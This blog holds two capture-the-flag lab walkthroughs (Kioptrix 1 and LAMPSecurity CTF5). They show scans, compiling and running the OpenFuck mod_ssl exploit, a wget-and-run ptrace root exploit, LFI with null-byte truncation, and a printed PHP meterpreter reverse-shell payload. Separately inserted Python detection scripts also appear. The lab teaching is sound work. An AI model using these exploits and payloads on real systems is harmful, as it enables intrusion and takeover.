Sunday, November 15, 2015

Tango Down (Kioptrix1) : Kioptrix Level 1 (#1) Challenge Walkthrough


Lab Environment :

Victim Host : https://www.vulnhub.com/entry/kioptrix-level-1-1,22/ on VirtualBox
Attacking Host : KALI (On Virtual Box)
Network : Host-Only (VirtualBox)
Tools : As mentioned in the walkthrough below

Discovery : Changed the VM's network setting to host-only and ran an nmap scan

root@kali:~/tools/practice/bash/lab# nmap -sT 192.168.56.1-254

Starting Nmap 6.47 ( http://nmap.org ) at 2015-10-27 23:09 GMT
Nmap scan report for 192.168.56.1
Host is up (0.0036s latency).
All 1000 scanned ports on 192.168.56.1 are closed
MAC Address: 0A:00:27:00:00:00 (Unknown)

Nmap scan report for 192.168.56.100
Host is up (0.00012s latency).
All 1000 scanned ports on 192.168.56.100 are filtered
MAC Address: 08:00:27:BD:93:7E (Cadmus Computer Systems)

Nmap scan report for 192.168.56.101
Host is up (0.0016s latency).
Not shown: 996 closed ports
PORT      STATE SERVICE
22/tcp    open  ssh
111/tcp   open  rpcbind
139/tcp   open  netbios-ssn
32768/tcp open  filenet-tms
MAC Address: 08:00:27:96:FA:49 (Cadmus Computer Systems)

Nmap scan report for 192.168.56.110
Host is up (0.00030s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE
22/tcp open  ssh

Nmap done: 254 IP addresses (4 hosts up) scanned in 15.41 seconds

Additional Scan

root@kali:~/tools/practice/bash/lab# nmap -v -sS -sV -O 192.168.56.101

Starting Nmap 6.47 ( http://nmap.org ) at 2015-10-27 23:14 GMT
NSE: Loaded 29 scripts for scanning.
Initiating ARP Ping Scan at 23:14
Scanning 192.168.56.101 [1 port]
Completed ARP Ping Scan at 23:14, 0.01s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 23:14
Completed Parallel DNS resolution of 1 host. at 23:14, 0.02s elapsed
Initiating SYN Stealth Scan at 23:14
Scanning 192.168.56.101 [1000 ports]
Discovered open port 443/tcp on 192.168.56.101
Discovered open port 139/tcp on 192.168.56.101
Discovered open port 22/tcp on 192.168.56.101
Discovered open port 111/tcp on 192.168.56.101
Discovered open port 80/tcp on 192.168.56.101
Discovered open port 32768/tcp on 192.168.56.101
Completed SYN Stealth Scan at 23:14, 0.34s elapsed (1000 total ports)
Initiating Service scan at 23:14
Scanning 6 services on 192.168.56.101
Completed Service scan at 23:14, 12.08s elapsed (6 services on 1 host)
Initiating OS detection (try #1) against 192.168.56.101
NSE: Script scanning 192.168.56.101.
Initiating NSE at 23:14
Completed NSE at 23:14, 0.04s elapsed
Nmap scan report for 192.168.56.101
Host is up (0.00031s latency).
Not shown: 994 closed ports

PORT      STATE SERVICE     VERSION
22/tcp    open  ssh         OpenSSH 2.9p2 (protocol 1.99)
80/tcp    open  http        Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
111/tcp   open  rpcbind     2 (RPC #100000)
139/tcp   open  netbios-ssn Samba smbd (workgroup: 9DMYGROUP)
443/tcp   open  ssl/http    Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
32768/tcp open  status      1 (RPC #100024)
MAC Address: 08:00:27:96:FA:49 (Cadmus Computer Systems)
Device type: general purpose
Running: Linux 2.4.X
OS CPE: cpe:/o:linux:linux_kernel:2.4
OS details: Linux 2.4.9 - 2.4.18 (likely embedded)
Uptime guess: 0.005 days (since Tue Oct 27 23:08:14 2015)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=195 (Good luck!)
IPID Sequence Generation: All zeros

Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.50 seconds
Raw packets sent: 1020 (45.626KB) | Rcvd: 1018 (41.493KB)

So some vectors we see from above are :
  • SSH Server
  • Web Server (http, https)
  • Samba Server
  • NFS Server, Portmapper (111)
Tried accessing the web server:

Seems like a Red Hat server

Let's run some Nmap NSE scripts:

-- Tried the http NSE scripts - no results
-- Tried the SMB NSE scripts, including smb-vulns-scan -- nothing interesting


Vulnerability Assessment and Exploit :
Run Nikto:

root@kali:~/vulhub/kioptrix1.0# nikto -h 192.168.56.101
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.101
+ Target Hostname: 192.168.56.101
+ Target Port: 80
+ Start Time: 2015-10-27 23:33:56 (GMT0)
---------------------------------------------------------------------------
+ Server: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
+ Server leaks inodes via ETags, header found with file /, inode: 34821, size: 2890, mtime: Thu Sep 6 04:12:46 2001
+ The anti-clickjacking X-Frame-Options header is not present.
+ OSVDB-27487: Apache is vulnerable to XSS via the Expect header
+ Apache/1.3.20 appears to be outdated (current is at least Apache/2.4.7). Apache 2.0.65 (final release) and 2.2.26 are also current.
+ mod_ssl/2.8.4 appears to be outdated (current is at least 2.8.31) (may depend on server version)
+ OpenSSL/0.9.6b appears to be outdated (current is at least 1.0.1e). OpenSSL 0.9.8r is also current.
+ OSVDB-637: Enumeration of users is possible by requesting ~username (responds with 'Forbidden' for users, 'not found' for non-existent users).
+ Allowed HTTP Methods: GET, HEAD, OPTIONS, TRACE
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-838: Apache/1.3.20 - Apache 1.x up 1.2.34 are vulnerable to a remote DoS and possible code execution. CAN-2002-0392.
+ OSVDB-4552: Apache/1.3.20 - Apache 1.3 below 1.3.27 are vulnerable to a local buffer overflow which allows attackers to kill any process on the system. CAN-2002-0839.
+ OSVDB-2733: Apache/1.3.20 - Apache 1.3 below 1.3.29 are vulnerable to overflows in mod_rewrite and mod_cgi. CAN-2003-0542.
+ mod_ssl/2.8.4 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell. CVE-2002-0082, OSVDB-756.
+ ///etc/hosts: The server install allows reading of any system file by adding an extra '/' to the URL.
+ OSVDB-682: /usage/: Webalizer may be installed. Versions lower than 2.01-09 vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-3268: /manual/: Directory indexing found.
+ OSVDB-3092: /manual/: Web server manual found.
+ OSVDB-3268: /icons/: Directory indexing found.
+ ERROR: Error limit (20) reached for host, giving up. Last error: error reading HTTP response
+ Scan terminated: 10 error(s) and 18 item(s) reported on remote host
+ End Time: 2015-10-27 23:40:54 (GMT0) (418 seconds)
---------------------------------------------------------------------------
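As an added defensive check (not code from this walkthrough or from Nikto), the Python below parses a Server banner like the one reported above and compares each component against the version thresholds Nikto quoted (Apache 1.3 below 1.3.27 and 1.3.29, mod_ssl 2.8.7 and lower), handling OpenSSL-style letter suffixes such as 0.9.6b; the rule-table layout, the function names and the patched-server banner used for contrast are assumptions of the example.

```python
import re

# Version thresholds quoted in the Nikto output above. The tuple layout
# (component, branch, operator, threshold, reference) is an assumption of
# this example, not Nikto's own database format.
RULES = [
    ("Apache",  "1.3", "<",  "1.3.27", "CAN-2002-0839 / OSVDB-4552: local buffer overflow"),
    ("Apache",  "1.3", "<",  "1.3.29", "CAN-2003-0542 / OSVDB-2733: mod_rewrite and mod_cgi overflows"),
    ("mod_ssl", "2",   "<=", "2.8.7",  "CVE-2002-0082 / OSVDB-756: remote buffer overflow"),
]

# "name/version" pairs inside a Server header; the optional trailing letter
# covers OpenSSL-style versions such as 0.9.6b.
COMPONENT_RE = re.compile(r"([A-Za-z_][\w-]*)/(\d+(?:\.\d+)*[a-z]?)")


def parse_banner(banner):
    """Map component name to version string, e.g.
    'Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b'
    -> {'Apache': '1.3.20', 'mod_ssl': '2.8.4', 'OpenSSL': '0.9.6b'}."""
    return dict(COMPONENT_RE.findall(banner))


def version_key(version, width=4):
    """Turn '1.3.20' or '0.9.6b' into a tuple that sorts the way the vendors
    number releases: numeric fields first, then the patch letter (no letter
    sorts before 'a', so 0.9.6 < 0.9.6a < 0.9.6b)."""
    m = re.fullmatch(r"(\d+(?:\.\d+)*)([a-z]?)", version)
    if not m:
        raise ValueError("unparseable version: %r" % version)
    fields = [int(x) for x in m.group(1).split(".")]
    fields += [0] * (width - len(fields))          # pad so 1.3 == 1.3.0.0
    letter = ord(m.group(2)) - ord("a") + 1 if m.group(2) else 0
    return tuple(fields) + (letter,)


def check_banner(banner):
    """Return [(component, version, reference), ...] for every rule the
    banner's components satisfy; [] means no quoted threshold applies."""
    found = parse_banner(banner)
    hits = []
    for component, branch, op, threshold, reference in RULES:
        version = found.get(component)
        # Each rule is scoped to one release branch (e.g. 1.3.x), as in the
        # Nikto wording; other branches are not compared against it.
        if version is None or not version.startswith(branch + "."):
            continue
        have, limit = version_key(version), version_key(threshold)
        if (op == "<" and have < limit) or (op == "<=" and have <= limit):
            hits.append((component, version, reference))
    return hits


if __name__ == "__main__":
    # First banner copied from the Nmap/Nikto output above; the second is a
    # constructed patched-server banner for contrast.
    for banner in ("Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b",
                   "Apache/1.3.29 (Unix) mod_ssl/2.8.16 OpenSSL/0.9.7c"):
        print(banner)
        for component, version, reference in check_banner(banner):
            print("  %s %s: %s" % (component, version, reference))
```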

Found some vulnerabilities as above. Search for CVE-2002-0082 and you will get the link below :

https://www.exploit-db.com/exploits/764/

Once you download this, you need to compile and execute it :

root@kali:~/vulhub/kioptrix1.0# ls
764.c http-nse.txt smb-nse.txt

root@kali:~/vulhub/kioptrix1.0# gcc 764.c -o openfk
764.c:651:2: error: unknown type name ‘RC4_KEY’
764.c:652:2: error: unknown type name ‘RC4_KEY’
764.c: In function ‘read_ssl_packet’:
764.c:844:7: error: ‘MD5_DIGEST_LENGTH’ undeclared (first use in this function)
764.c:844:7: note: each undeclared identifier is reported only once for each function it appears in
764.c: In function ‘send_ssl_packet’:
764.c:882:2: error: unknown type name ‘MD5_CTX’
764.c:887:23: error: ‘MD5_DIGEST_LENGTH’ undeclared (first use in this function)
764.c: In function ‘get_server_hello’:
764.c:1009:2: warning: passing argument 2 of ‘d2i_X509’ from incompatible pointer type [enabled by default]
In file included from /usr/include/openssl/ssl.h:156:0,
from 764.c:20:
/usr/include/openssl/x509.h:840:1: note: expected ‘const unsigned char **’ but argument is of type ‘unsigned char **’
764.c: In function ‘generate_key_material’:
764.c:1106:2: error: unknown type name ‘MD5_CTX’
764.c:1111:42: error: ‘MD5_DIGEST_LENGTH’ undeclared (first use in this function)
764.c: In function ‘generate_session_keys’:
764.c:1127:23: error: ‘RC4_KEY’ undeclared (first use in this function)
764.c:1127:31: error: expected expression before ‘)’ token
764.c:1131:32: error: expected expression before ‘)’ token

Now it is very likely that you get the above error while compiling. After hours of searching I found the link below, which can help in fixing the problem... (I so wish I knew C programming)

http://paulsec.github.io/blog/2014/04/14/updating-openfuck-exploit/
Here are the steps to make this work :

1) Add these headers (the ones declaring RC4_KEY and MD5_CTX, which the compiler errors above complain about) :

#include <openssl/rc4.h>
#include <openssl/md5.h>

2) Update the URL in the C file.

Search for wget and replace the URL with this new one :
http://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c

3) Get the libssl-dev library

Install it : apt-get install libssl-dev

4) Update the variable declarations

Line 961, change : unsigned char *p, *end;
by adding const : const unsigned char *p, *end;

5) Compile the code and you're done

To compile :
gcc -o OpenFuck 764.c -lcrypto

root@kali:~/vulhub/kioptrix1.0# gcc openfk.c -o openfk -lcrypto

root@kali:~/vulhub/kioptrix1.0# ls -l
total 140
-rw-r--r-- 1 root root 33617 Oct 27 23:39 764.c
-rw-r--r-- 1 root root 2289 Oct 27 23:23 http-nse.txt
-rwxr-xr-x 1 root root 60991 Oct 27 23:47 openfk
-rw-r--r-- 1 root root 33684 Oct 27 23:46 openfk.c
-rw-r--r-- 1 root root 351 Oct 27 23:24 smb-nse.txt
root@kali:~/vulhub/kioptrix1.0# ./openfk

*******************************************************************
* OpenFuck v3.0.32-root priv8 by SPABAM based on openssl-too-open *
*******************************************************************
* by SPABAM with code of Spabam - LSD-pl - SolarEclipse - CORE *
* #hackarena irc.brasnet.org *
* TNXXanthicUSG #SilverLords#BloodBR#isotk#highsecure#uname*
* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC#TechTeam*
* #pinchadoreswebHiTechHateDigitalWrapperzP()W GATButtP!rateZ*
*******************************************************************

: Usage: ./openfk target box [port] [-c N]

target - supported box eg: 0x00
box - hostname or IP address
port - port for ssl connection
-c open N connections. (use range 40-50 if u dont know)
++++ Truncated++++++++++++++++++

Now for the targets, the closest match to our version from nmap is as below
0x6a - RedHat Linux 7.2 (apache-1.3.20-16)1
0x6b - RedHat Linux 7.2 (apache-1.3.20-16)2

nmap output : 80/tcp open http Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)


Running the exploit
root@kali:~/vulhub/kioptrix1.0# ./openfk 0x6a 192.168.56.101 443 -c 50

Connection... 50 of 50
Establishing SSL connection
cipher: 0x4043808c ciphers: 0x80f8050
Ready to send shellcode
Spawning shell...
Good Bye!

0x6a did not give us a shell, let's try the other one... 0x6b



root@kali:~/vulhub/kioptrix1.0# ./openfk 0x6b 192.168.56.101 443 -c 50


Connection... 50 of 50
Establishing SSL connection
cipher: 0x4043808c ciphers: 0x80f8050
Ready to send shellcode
Spawning shell...
bash: no job control in this shell
bash-2.05$
exploits/ptrace-kmod.c; gcc-o p ptrace-kmod.c; rm ptrace-kmod.c; ./p; net/0304-
--23:51:51-- http://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c
=> `ptrace-kmod.c'
Connecting to dl.packetstormsecurity.net:80...
dl.packetstormsecurity.net: Host not found.
gcc: ptrace-kmod.c: No such file or directory
gcc: No input files
rm: cannot remove `ptrace-kmod.c': No such file or directory
bash: ./p: No such file or directory
bash-2.05$
bash-2.05$ id
id
uid=48(apache) gid=48(apache) groups=48(apache)
bash-2.05$ hostname
hostname
kioptrix.level1
bash-2.05$ uname -a
uname -a
Linux kioptrix.level1 2.4.7-10 #1 Thu Sep 6 16:46:36 EDT 2001 i686 unknown
bash-2.05$ cat /etc/release
cat /etc/release
cat: /etc/release: No such file or directory
bash-2.05$ cat /etc/issue
cat /etc/issue
Welcome to Kioptrix Level 1 Penetration and Assessment Environment

--The object of this game:
|_Acquire "root" access to this machine.

There are many ways this can be done, try and find more then one way to
appreciate this exercise.

DISCLAIMER: Kioptrix is not resposible for any damage or instability
caused by running, installing or using this VM image.
Use at your own risk.

WARNING: This is a vulnerable system, DO NOT run this OS in a production
environment. Nor should you give this system access to the outside world
(the Internet - or Interwebs..)

Good luck and have fun!

bash-2.05$ Good Bye!

Now we are in and have a shell. Time to escalate our privileges.

Privilege Escalation
When we run the above exploit, we see that it tries to download ptrace-kmod.c to give us a root shell, however that doesn't happen.

exploits/ptrace-kmod.c; gcc-o p ptrace-kmod.c; rm ptrace-kmod.c; ./p; net/0304-
--23:51:51-- http://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c
=> `ptrace-kmod.c'

What we can do is download this file manually on our host :

http://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c

Once you download it, compile it.. when I compile it on my Kali node, below is what I get..

root@kali:~/vulhub/kioptrix1.0# gcc 895.c -o privesc1
895.c:80:1: warning: missing terminating " character [enabled by default]
895.c:80:1: error: missing terminating " character
895.c:81:1: error: stray ‘\’ in program
895.c:81:1: error: stray ‘\’ in program
895.c:81:2: error: ‘x00’ undeclared here (not in a function)
895.c:81:6: error: expected ‘,’ or ‘;’ before ‘x00’
895.c:81:6: error: stray ‘\’ in program
895.c:81:6: error: stray ‘\’ in program
895.c:81:6: error: stray ‘\’ in program
895.c:81:6: error: stray ‘\’ in program
895.c:81:6: error: stray ‘\’ in program
895.c:81:6: error: stray ‘\’ in program
895.c:81:6: error: stray ‘\’ in program
895.c:81:6: error: stray ‘\’ in program
895.c:81:6: error: stray ‘\’ in program
895.c:81:6: error: stray ‘\’ in program
895.c:81:6: error: stray ‘\’ in program
895.c:81:6: error: stray ‘\’ in program
895.c:81:6: error: stray ‘\’ in program
895.c:81:6: error: stray ‘\’ in program
895.c:81:6: error: stray ‘\’ in program
895.c:81:6: error: stray ‘\’ in program
895.c:81:6: error: stray ‘\’ in program
895.c:82:1: error: stray ‘\’ in program
895.c:82:1: error: stray ‘\’ in program
895.c:82:1: error: stray ‘\’ in program
895.c:82:1: error: stray ‘\’ in program
895.c:82:1: error: stray ‘\’ in program
895.c:82:1: error: stray ‘\’ in program
895.c:82:1: error: stray ‘\’ in program
895.c:82:1: error: stray ‘\’ in program
895.c:82:1: error: stray ‘\’ in program
895.c:82:1: error: stray ‘\’ in program
895.c:82:1: error: stray ‘\’ in program
895.c:82:1: error: stray ‘\’ in program
895.c:82:1: error: stray ‘\’ in program
895.c:82:1: error: stray ‘\’ in program
895.c:82:1: error: stray ‘\’ in program

This is full of errors, probably because it's a newer compiler version. What I did was transfer this C file from my attacking node to the victim node and compile it there, as that has the older version. Post compilation I ran the binary.

bash-2.05$ wget http://192.168.56.110/ptrace-kmod.c
wget http://192.168.56.110/ptrace-kmod.c
--00:05:36-- http://192.168.56.110/ptrace-kmod.c
=> `ptrace-kmod.c'
Connecting to 192.168.56.110:80... connected!
HTTP request sent, awaiting response... 200 OK
Length: 3,921 [text/x-csrc]

0K ... 100% @ 3.74 MB/s

00:05:36 (3.74 MB/s) - `ptrace-kmod.c' saved [3921/3921]

bash-2.05$ ls
ls
895.c
ptrace-kmod.c
bash-2.05$ gcc ptrace-kmodc -o ptrace
gcc ptrace-kmodc -o ptrace
gcc: ptrace-kmodc: No such file or directory
gcc: No input files
bash-2.05$ gcc ptrace-kmodc.c -o ptrace
gcc ptrace-kmodc.c -o ptrace
gcc: ptrace-kmodc.c: No such file or directory
gcc: No input files
bash-2.05$ gcc ptrace-kmod.c -o ptrace
gcc ptrace-kmod.c -o ptrace
bash-2.05$ ls
ls
895.c
ptrace
ptrace-kmod.c
bash-2.05$ chmod +x ptrace
chmod +x ptrace
bash-2.05$ ./ptrace
./ptrace
[+] Attached to 6416
[+] Waiting for signal
[+] Signal caught
[+] Shellcode placed at 0x4001189d
[+] Now wait for suid shell...


id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)


We are now root on the node


Sunday, November 1, 2015

Tango Down (CTF5) : Capture The Flag (CTF) 5 Lamp Security Challenge


Lab Environment :

Victim Host : https://www.vulnhub.com/entry/lampsecurity-ctf5,84/ on VirtualBox (MacOS)
Attacking Host : KALI (On Virtual Box)
Network : Host-Only (VirtualBox)
Tools : As mentioned in the walkthrough below


Discovery :

Install the image

Run a network scan on the range :
root@kali:~/vulhub/ctf5# nmap -sT 192.168.56.1-254
Starting Nmap 6.47 ( http://nmap.org ) at 2015-10-31 00:22 GMT
Nmap scan report for 192.168.56.1
Host is up (0.00036s latency).
All 1000 scanned ports on 192.168.56.1 are closed
MAC Address: 0A:00:27:00:00:00 (Unknown)

Nmap scan report for 192.168.56.100
Host is up (0.000079s latency).
All 1000 scanned ports on 192.168.56.100 are filtered
MAC Address: 08:00:27:79:AC:8C (Cadmus Computer Systems)

Nmap scan report for 192.168.56.101
Host is up (0.0023s latency).
Not shown: 990 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
25/tcp   open  smtp
80/tcp   open  http
110/tcp  open  pop3
111/tcp  open  rpcbind
139/tcp  open  netbios-ssn
143/tcp  open  imap
445/tcp  open  microsoft-ds
901/tcp  open  samba-swat
3306/tcp open  mysql
MAC Address: 08:00:27:C3:02:2B (Cadmus Computer Systems)

Nmap scan report for 192.168.56.110
Host is up (0.00010s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Nmap done: 254 IP addresses (4 hosts up) scanned in 15.32 seconds


Possible vectors are :

  • Web server
  • Mail (IMAP, POP)
  • NFS, Portmapper
  • netbios
  • samba
  • mysql


Assessing the web server:
Open the link in a browser (http://192.168.56.101)

It gives us a default Linux Apache page :

Just tried giving different paths

e.g. index.php... gives the below :

When I click Blog I get :

When I go back and click Contact :

Go back and click Events

Now we see this has different web apps installed.

Now on the blog page, clicking on the links in the navigation pane, I got the below :

Webmail

Admin Login





Vulnerability Assessment and Exploit :

The Squirrelmail version had 2 known vulnerabilities :
root@kali:/var/www# searchsploit squirrel | grep 1.4.x
SquirrelMail 1.4.x Folder Name Cross-Site Scripting Vulnerability | /php/webapps/24068.txt
Squirrelmail 1.4.x Redirect.PHP Local File Include Vulnerability | /php/webapps/27948.txt

Tried them :
Squirrelmail 1.4.x Redirect.PHP Local File Include Vulnerability :

SquirrelMail 1.4.x Folder Name Cross-Site Scripting Vulnerability

Same as above, no luck..

Now let's run Nikto to see if we can get some more :

root@kali:~/tools/practice/bash/lab# nikto -h http://192.168.56.101

- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.101
+ Target Hostname: 192.168.56.101
+ Target Port: 80
+ Start Time: 2015-10-31 21:18:00 (GMT0)
---------------------------------------------------------------------------
+ Server: Apache/2.2.6 (Fedora)
+ Retrieved x-powered-by header: PHP/5.2.4
+ The anti-clickjacking X-Frame-Options header is not present.
+ Apache/2.2.6 appears to be outdated (current is at least Apache/2.4.7). Apache 2.0.65 (final release) and 2.2.26 are also current.
+ OSVDB-637: Enumeration of users is possible by requesting ~username (responds with 'Forbidden' for users, 'not found' for non-existent users).
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ /index.php?page=../../../../../../../../../../etc/passwd: PHP include error may indicate local or remote file inclusion is possible.
+ /index.php?page=../../../../../../../../../../boot.ini: PHP include error may indicate local or remote file inclusion is possible.
+ OSVDB-12184: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3092: /phpmyadmin/changelog.php: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ Cookie SQMSESSID created without the httponly flag
+ OSVDB-3093: /mail/src/read_body.php: SquirrelMail found
+ OSVDB-3093: /squirrelmail/src/read_body.php: SquirrelMail found
+ OSVDB-3233: /info.php: PHP is installed, and a test script which runs phpinfo() was found. This gives a lot of system information.
+ OSVDB-3268: /icons/: Directory indexing found.
+ Server leaks inodes via ETags, header found with file /icons/README, inode: 557285, size: 5108, mtime: Fri Jun 19 19:31:28 1998
+ OSVDB-3233: /icons/README: Apache default file found.
+ /index.php?module=PostWrap&page=http://cirt.net/rfiinc.txt?: PHP include error may indicate local or remote file inclusion is possible.
+ /index.php?page=http://cirt.net/rfiinc.txt?: PHP include error may indicate local or remote file inclusion is possible.
+ /index.php?page=http://cirt.net/rfiinc.txt?: PHP include error may indicate local or remote file inclusion is possible.
+ /index.php?page=http://cirt.net/rfiinc.txt??: PHP include error may indicate local or remote file inclusion is possible.
+ /index.php?page[path]=http://cirt.net/rfiinc.txt??&cmd=ls: PHP include error may indicate local or remote file inclusion is possible.
+ OSVDB-5292: /info.php?file=http://cirt.net/rfiinc.txt?: RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/
+ /phpmyadmin/: phpMyAdmin directory found

+ 7355 requests: 0 error(s) and 27 item(s) reported on remote host
+ End Time: 2015-10-31 21:18:37 (GMT0) (37 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

So now we have some more vectors.

Trying the paths below one by one :
/index.php?page=../../../../../../../../../../etc/passwd << As per Nikto, no luck





We removed the path and saw what came up; as we can see above, the application is also adding .php as a suffix, so we need to terminate the path with a null byte, which stops the .php suffix from being appended

Now keep adding ../ in front of etc/passwd until we get some results

Bang, we see the LFI is successful.

Now we try to fetch some more information, e.g. the mysql configuration:



[mysqld]
datadir=/var/lib/mysql
socket=/var/lib/mysql/mysql.sock
user=mysql
# Default to using old password format for compatibility with mysql 3.x
# clients (those using the mysqlclient10 compatibility package).
old_passwords=1

[mysqld_safe]
log-error=/var/log/mysqld.log
pid-file=/var/run/mysqld/mysqld.pid

Try viewing access_log :
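Seen from the defender's side, the Nikto probes above and the null-byte trick leave a recognisable trail in access_log. The Python below is an added example, not code from this walkthrough or from the CTF5 image: it parses constructed Apache access-log lines modelled on those requests and flags query values carrying traversal sequences, null bytes or remote include URLs, then counts hits per client; the log lines, the function names and the detection heuristics are assumptions of the example.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed Apache common-log lines modelled on the Nikto probes quoted
# above and on the null-byte truncation used in this section; they are not
# taken from the CTF5 image.
SAMPLE_LOG = """\
192.168.56.110 - - [31/Oct/2015:21:18:05 +0000] "GET /index.php?page=../../../../../../../../../../etc/passwd HTTP/1.1" 200 1843
192.168.56.110 - - [31/Oct/2015:21:18:06 +0000] "GET /index.php?page=../../../../../../etc/passwd%00 HTTP/1.1" 200 2311
192.168.56.110 - - [31/Oct/2015:21:18:09 +0000] "GET /index.php?page=http://cirt.net/rfiinc.txt? HTTP/1.1" 200 512
192.168.56.110 - - [31/Oct/2015:21:18:10 +0000] "GET /info.php?file=http://cirt.net/rfiinc.txt? HTTP/1.1" 200 512
192.168.56.1 - - [31/Oct/2015:21:20:00 +0000] "GET /index.php?page=blog HTTP/1.1" 200 4120
192.168.56.1 - - [31/Oct/2015:21:20:03 +0000] "GET /mail/src/read_body.php?mailbox=INBOX HTTP/1.1" 200 9001
"""

# Common/combined log format: client ident user [timestamp] "METHOD target PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)
# Schemes that PHP's include() fetches over the network when allow_url_include is on.
REMOTE_RE = re.compile(r"^(https?|ftp)://", re.IGNORECASE)


def classify_value(value):
    """Reasons one percent-decoded query value looks like an LFI/RFI probe ([] if benign)."""
    decoded = unquote(value)   # a second decode pass catches %252e%252e / %2500
    reasons = []
    if "../" in decoded or "..\\" in decoded:
        reasons.append("directory traversal")
    if "\x00" in decoded:
        reasons.append("null byte (suffix truncation)")
    if REMOTE_RE.match(decoded):
        reasons.append("remote include URL")
    return reasons


def scan_access_log(text):
    """Parse log lines and return one finding per suspicious query parameter."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue                      # not a request line we understand
        url = urlsplit(m.group("target"))
        # parse_qsl already percent-decodes once, so %00 arrives here as "\x00".
        for name, value in parse_qsl(url.query, keep_blank_values=True):
            reasons = classify_value(value)
            if reasons:
                findings.append({
                    "ip": m.group("ip"), "time": m.group("ts"),
                    "path": url.path, "param": name,
                    "status": int(m.group("status")), "reasons": reasons,
                })
    return findings


def hits_per_client(findings):
    """Count findings by client address; a burst from one source is the scanner."""
    counts = {}
    for f in findings:
        counts[f["ip"]] = counts.get(f["ip"], 0) + 1
    return counts


if __name__ == "__main__":
    found = scan_access_log(SAMPLE_LOG)
    for f in found:
        print("%(ip)s %(path)s?%(param)s= -> %(status)d: %(reasons)s" % f)
    print(hits_per_client(found))
```

A 200 status on a traversal request, as in the sample, is the signal worth paging on: the include succeeded rather than erroring out.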




Another vector was NanoCMS




Using Google :



http://www.securityfocus.com/bid/34508/exploit

When we try this :





For us the key from above is :
"username";s:5:"admin";s:8:"password";s:32:"9d2f75377ac0ab991d40c91fd27e52fd";s:7:"version";s:4:"v_4f";}

Now cracking the password :





Now let's try to access the portal : We managed to log in to the admin panel




Now we see that we have an option to create a new page using the admin panel

My steps would be :

1- Create a PHP payload on my Kali host
2- Create a page on NanoCMS and paste the code into it
3- Open a handler on my Kali host
4- Open the shellcode page
5- We should get our meterpreter on our Kali host

Let's try it now.


Step 1 :

root@kali:/var/www# msfpayload php/meterpreter/reverse_tcp LHOST=192.168.56.110 LPORT=4444 R > malicious.php
[!] ************************************************************************
[!] * The utility msfpayload is deprecated! *
[!] * It will be removed on or about 2015-06-08 *
[!] * Please use msfvenom instead *
[!] * Details: https://github.com/rapid7/metasploit-framework/pull/4333 *
[!] ************************************************************************
root@kali:/var/www# vi malicious.php
root@kali:/var/www# cat malicious.php
#<?php
error_reporting(0);
# The payload handler overwrites this with the correct LHOST before sending
# it to the victim.
$ip = '192.168.56.110';
$port = 4444;
$ipf = AF_INET;

if (FALSE !== strpos($ip, ":")) {
# ipv6 requires brackets around the address
$ip = "[" . $ip . "]";
$ipf = AF_INET6;
}

if (($f = 'stream_socket_client') && is_callable($f)) {
$s = $f("tcp://{$ip}:{$port}");
$s_type = 'stream';
} elseif (($f = 'fsockopen') && is_callable($f)) {
$s = $f($ip, $port);
$s_type = 'stream';
} elseif (($f = 'socket_create') && is_callable($f)) {
$s = $f($ipf, SOCK_STREAM, SOL_TCP);
$res = @socket_connect($s, $ip, $port);
if (!$res) { die(); }
$s_type = 'socket';
} else {
die('no socket funcs');
}
if (!$s) { die('no socket'); }

switch ($s_type) {
case 'stream': $len = fread($s, 4); break;
case 'socket': $len = socket_read($s, 4); break;
}
if (!$len) {
# We failed on the main socket. There's no way to continue, so
